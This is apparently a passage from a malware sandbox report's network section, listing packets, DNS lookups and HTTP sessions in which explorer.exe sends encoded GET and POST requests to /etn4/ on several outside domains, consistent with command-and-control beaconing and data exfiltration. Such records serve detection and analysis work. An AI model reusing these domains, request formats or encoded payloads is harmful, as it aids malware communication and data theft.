                                                Aug 8, 2022 16:11:20.450803995 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450856924 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450884104 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450889111 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.450927019 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450953960 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450953960 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.450980902 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.451008081 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.451015949 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.451046944 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.595535994 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.595577955 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.595730066 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:21.145468950 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.158934116 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.296170950 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.296277046 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.296473980 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.433641911 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.554661036 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.555401087 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:22.555531025 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.558259010 CEST4979980192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:22.696208954 CEST8049799108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:27.620436907 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.755534887 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.755954981 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.756026030 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.891019106 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891092062 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891113043 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891132116 CEST8049800192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:27.891212940 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:27.891721010 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:28.768277884 CEST4980080192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.784462929 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.928798914 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:29.929754019 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:29.950834990 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.095041037 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095088959 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095129013 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095169067 CEST8049802192.185.131.238192.168.2.6
                                                Aug 8, 2022 16:11:30.095267057 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.095343113 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.110415936 CEST4980280192.168.2.6192.185.131.238
                                                Aug 8, 2022 16:11:30.254679918 CEST8049802192.185.131.238192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 16:11:09.126292944 CEST6060953192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:09.145854950 CEST53606098.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:19.962970972 CEST6264353192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:19.980540037 CEST53626438.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:27.599814892 CEST5401553192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:27.619285107 CEST53540158.8.8.8192.168.2.6
                                                Aug 8, 2022 16:11:35.113869905 CEST5008153192.168.2.68.8.8.8
                                                Aug 8, 2022 16:11:35.238023996 CEST53500818.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 16:11:09.126292944 CEST192.168.2.68.8.8.80x35Standard query (0)www.funwave.infoA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:19.962970972 CEST192.168.2.68.8.8.80xf0f3Standard query (0)www.reprograme-se10x.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:27.599814892 CEST192.168.2.68.8.8.80x9609Standard query (0)www.tadeumilhosrp.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:35.113869905 CEST192.168.2.68.8.8.80x5e59Standard query (0)www.claudianavarro.onlineA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 16:11:09.145854950 CEST8.8.8.8192.168.2.60x35No error (0)www.funwave.info103.141.97.24A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:19.980540037 CEST8.8.8.8192.168.2.60xf0f3No error (0)www.reprograme-se10x.comreprograme-se10x.comCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:19.980540037 CEST8.8.8.8192.168.2.60xf0f3No error (0)reprograme-se10x.com108.167.169.56A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:27.619285107 CEST8.8.8.8192.168.2.60x9609No error (0)www.tadeumilhosrp.comtadeumilhosrp.comCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:27.619285107 CEST8.8.8.8192.168.2.60x9609No error (0)tadeumilhosrp.com192.185.131.238A (IP address)IN (0x0001)
                                                Aug 8, 2022 16:11:35.238023996 CEST8.8.8.8192.168.2.60x5e59No error (0)www.claudianavarro.onlineclaudianavarro.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 16:11:35.238023996 CEST8.8.8.8192.168.2.60x5e59No error (0)claudianavarro.online92.249.45.183A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.funwave.info
                                                • www.reprograme-se10x.com
                                                • www.tadeumilhosrp.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.649796103.141.97.2480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:09.452039003 CEST11238OUTGET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1
                                                Host: www.funwave.info
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:09.803188086 CEST11239INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 14:11:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.649798108.167.169.5680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:20.131123066 CEST11247OUTPOST /etn4/ HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.reprograme-se10x.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.reprograme-se10x.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
                                                Aug 8, 2022 16:11:20.450714111 CEST11249INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 14:11:20 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Content-Length: 14456
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 eb 92 e3 c6 b1 35 fa db fd 14 35 54 48 43 da 2c 10 e0 b5 1b 6c b6 2d c9 b2 3e 47 58 de 0e 8d bc bf 38 61 3b 26 8a 40 02 a8 e9 42 15 5c 55 e0 65 e8 3e 7f f7 73 7c 71 7e 9c 77 38 7f fd 62 27 0b e0 ad bb c1 be cd 8c e4 bd ad e9 21 59 95 95 b9 72 e5 ca 75 f9 ea b7 ff f1 f5 0f ff d7 9f be 21 99 cd c5 d5 d9 a5 fb 21 82 c9 74 d6 2a 2c fd d3 0f 2d 17 03 16 5f 9d fd e2 32 07 cb 48 94 31 6d c0 ce 5a 7f fe e1 77 f4 bc 45 7a fb 17 c9 72 98 b5 16 1c 96 85 d2 b6 45 22 25 2d 48 cc 5c f2 d8 66 b3 18 16 3c 02 5a 5d ba 84 4b 6e 39 13 d4 44 4c c0 2c a8 70 8e 60 5e 6b 35 57 d6 bc de 83 bc ce d9 8a f2 9c a5 40 0b 0d ae 49 28 98 4e e1 75 55 68 b9 15 70 f5 a7 7f fe 9f 94 4b 44 f8 e7 ff a3 08 48 57 aa 59 cc c8 17 9f 9d f7 83 60 4a be 87 42 ab 54 23 3e 35 40 80 fc e7 37 7f fc e7 7f 7d e9 5d f6 ea f2 b3 4b c1 e5 35 d1 20 66 af 63 69 5c 9f 04 6c 94 bd 26 19 9e 66 af 7b 3d 7d 0c 10 f8 2b 2f 52 79 4d e0 b1 4a e3 2d 3d a5 d3 3b c9 2d 26 2c 68 c9 2c b4 88 5d 17 a8 1e 2b 0a c1 23 66 b9 92 3d 6d cc af 56 b9 c0 27 47 6f d6 3a 41 9f 7c a1 d9 df 4b 35 25 bf 03 88 5b 75 c7 56 66 6d 61 c2 66 c6 bd 04 13 7b ad 4f 4d 85 c4 80 db cb 71 79 ff fc 3f 9a 2b f3 24 6a f8 71 15 e6 98 a3 89 34 2f ec d5 d9 92 cb 58 2d bd b7 cb 02 72 f5 8e bf 01 6b b9 4c 0d 99 91 4d 6b ce 0c fc 59 8b 56 b8 85 ff 6b ef af 3b cd ff da ab 6c 63 fe 8a e0 1a fe da ab 8a ff da 0b 86 9e ef f9 7f ed 4d fa ab 49 ff af bd 56 b7 05 2b 8b f5 5e 21 53 bc 98 45 fa 32 3c 2c ac d0 f0 f7 9b 1a 10 4f ee ae 4a 1d 41 2b dc b4 d0 97 28 6b 55 b6 c5 af e0 9b f4 f8 6b 6f 59 50 2e 23 51 c6 ae e1 3b 53 05 aa 52 8a 5b 03 9c da cb b9 f4 de 99 5f 2f 40 cf c6 48 21 68 dd dc 4c cf 7a bf 7c 45 7e c8 b8 21 09 17 40 f0 97 95 56 d1 14 24 68 6c 1d 93 5f f6 ce 5e 25 a5 8c dc 76 db d0 65 5d db d9 2c 98 26 b2 ab bb aa cb 67 cc 8b 34 60 e6 37 02 dc 3e da ad 88 c9 05 33 ad 4e b7 98 71 2f 05 fb b5 92 16 05 fb e2 8b e3 5b bb d5 8f 5b 9d e9 0e 98 18 84 de 02 b3 d9 1b ab 71 5d 5e a2 55 fe 75 c6 f4 d7 2a 86 2e cc da 85 17 e1 1c fa 7b 88 6c db ef fa 5d ee 2d 79 6c 33 fc cd 80 a7 99 c5 8e 1e 0e 21 7e 70 f8 cc 73 ae 5c b7 2d 8e d6 85 0e a6 fb 1d cc b4 ea b7 cc b2 3f 7f ff 87 76 a7 33 d5 60 4b 2d c9 cb 71 ed 16 17 66 b3 d9 2d ec 9b fd 60 51 1b ea b1 ec 7d a5 6a bb a2 0c d6 33 3a 9a a1 02 5e 0c 09 6e c7 7a 76 5d c0 ac e5 94 ea bd 63 28 67 9d d9 65 4e c2 6d bd f9 6a fd 03 4b ff 88 2e 68 b7 32 60 28 e7 5f fc bf 39 76 20 e3 af 33 2e e2 b6 45 1e 4a b7 d5 ec 4b ad d9 ba dd 4a 04 73 fe aa fd d4 c1 6e a6 2c 0a a5 ad 99 6d 00 4d b1 c6 99 64 1a be f2 bb 87 db 37 ab 08 0a fb 3b 2c c4 f8 4d 57 cf fc a9 be 54 9e 00 99 da 6c aa 7f f5 ab ce 01 e5 2f ea 2f fa 6f 7f 9b 1d cc d2 d9 f0 a4 fd aa f8 c7 3f 5e 1d 04 ec d4 a2 bf 0a a6 66 c9 6d 94 e1 56 dd 94 5f a1 3f 05 97 6e 66 55 b4 9c e0 e8 93 59 6b ec fb 64 d0 2f 56 e4 4b cd 99 68 e1 22 37 11 66 d6 93 84 db fd 99
                                                Data Ascii: 55THC,l->GX8a;&@B\Ue>s|q~w8b'!Yru!!t*,-_2H1mZwEzrE"%-H\f<Z]Kn9DL,p`^k5W@I(NuUhpKDHWY`JBT#>5@7}]K5 fci\l&f{=}+/RyMJ-=;-&,h,]+#f=mV'Go:A|K5%[uVfmaf{OMqy?+$jq4/X-rkLMkYVk;lcMIV+^!SE2<,OJA+(kUkoYP.#Q;SR[_/@H!hLz|E~!@V$hl_^%ve],&g4`7>3Nq/[[q]^Uu*.{l]-yl3!~ps\-?v3`K-qf-`Q}j3:^nzv]c(geNmjK.h2`(_9v 3.EJKJsn,mMd7;,MWTl//o?^fmV_?nfUYkd/VKh"7f


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.649799108.167.169.5680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:22.296473980 CEST11263OUTGET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1
                                                Host: www.reprograme-se10x.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:22.554661036 CEST11264INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 14:11:22 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.649800192.185.131.23880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:27.756026030 CEST11265OUTPOST /etn4/ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Content-Length: 418
                                                Cache-Control: no-cache
                                                Origin: http://www.tadeumilhosrp.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.tadeumilhosrp.com/etn4/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 63 52 76 74 35 78 54 68 3d 79 54 52 71 74 42 46 70 58 5f 6b 4e 44 76 44 76 77 58 43 2d 77 7a 57 53 6b 71 71 37 68 4f 4e 62 51 51 69 61 46 4b 49 56 74 37 6d 63 34 6d 51 70 4f 5f 54 63 5a 48 43 51 48 6f 4c 49 62 2d 56 6f 57 67 6c 49 54 56 6f 68 7a 6c 64 6c 37 6c 36 46 28 36 51 4c 6e 69 55 74 4b 64 49 39 50 55 34 67 6e 6e 70 35 63 34 6e 59 44 51 7a 63 45 43 32 76 5a 45 6e 4a 67 74 6f 70 42 41 35 49 51 5f 28 31 35 48 77 7a 48 72 64 47 48 6b 4a 34 32 54 63 5a 4f 37 76 67 6c 6e 70 63 42 74 70 63 72 66 4b 5f 56 69 36 48 4c 68 49 78 35 5f 69 44 74 51 46 34 51 6f 6b 33 41 65 75 5f 36 6a 49 66 6e 36 54 69 75 53 39 46 66 4a 4d 6a 78 6f 42 6c 63 59 76 65 43 75 74 66 7a 4f 69 4e 73 41 68 6f 47 7a 42 33 49 6f 44 47 30 54 37 48 6b 45 58 33 4e 32 58 32 66 48 7a 68 4d 64 49 69 37 67 39 54 6c 63 28 38 79 69 65 35 77 65 67 50 64 62 42 37 72 55 68 61 61 30 28 5a 6e 35 49 6c 53 39 6c 69 67 6d 69 59 6f 70 78 69 65 5a 42 32 61 77 50 73 38 53 6a 53 76 62 61 73 5a 52 63 55 4f 51 37 4b 36 55 6c 5a 78 43 76 6d 6f 42 4d 71 61 4d 44 4d 49 58 62 6f 56 39 61 72 52 7a 36 37 33 53 33 4c 38 2d 6b 57 43 32 5a 66 6a 30 77 73 4a 68 46 76 4f 74 47 39 28 53 4f 47 33 68 56 79 6c 37 74 4f 4d 32 35 62 6a 4d 74 50 32 38 28 77 54 69 63 42 76 74 30 57 30 39 35 6e 47 71 67 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg.
                                                Aug 8, 2022 16:11:27.891092062 CEST11267INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.649802192.185.131.23880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 16:11:29.950834990 CEST11270OUTGET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1
                                                Host: www.tadeumilhosrp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 16:11:30.095088959 CEST11275INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Mon, 08 Aug 2022 14:11:30 GMT
                                                Content-Type: text/html
                                                Content-Length: 3650
                                                Connection: close
                                                ETag: "616e0979-e42"
